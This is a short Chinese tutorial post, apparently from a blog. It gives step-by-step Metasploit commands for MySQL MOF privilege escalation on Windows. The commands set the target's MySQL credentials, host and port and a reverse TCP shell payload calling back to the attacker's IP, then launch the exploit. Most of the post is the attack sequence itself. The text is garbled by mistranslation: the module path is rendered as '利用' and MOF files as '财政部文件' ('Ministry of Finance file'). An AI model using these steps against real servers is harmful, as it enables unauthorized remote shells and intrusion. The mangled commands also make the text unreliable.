鉴于上篇文章,http://z2ppp.blog.51cto.com/11186185/1975985 mysql mof提权
metasploit已经有针对该方式的利用代码,原理还是一样生成财政部文件,只是metasploit中可以使用到反弹技术,就不用额外添加用户,前提是对方服务器允许访问公网
use 利用/windows/mysql/mysql_mof set password  xxx ,,,//设置登录mysql的密码 set username  xxx ,,,//设置登录mysql的用户 set rhost  xxx ,,,,,,//设置要登录的ip地址 set rport  xxxx ,,,,,//设置mysql的端口号 set payload  windows/shell_reverse_tcp ,,,//所使用的反弹模块 set lhost  xxx ,,,,,,//反弹到的ip地址 set lport  xxx ,,,,,,//反弹到的端口 show options ,,,,,,,//设置完成后,使用该命令可查看设置参数情况 exploit ,,,,,,,,,,,,//执行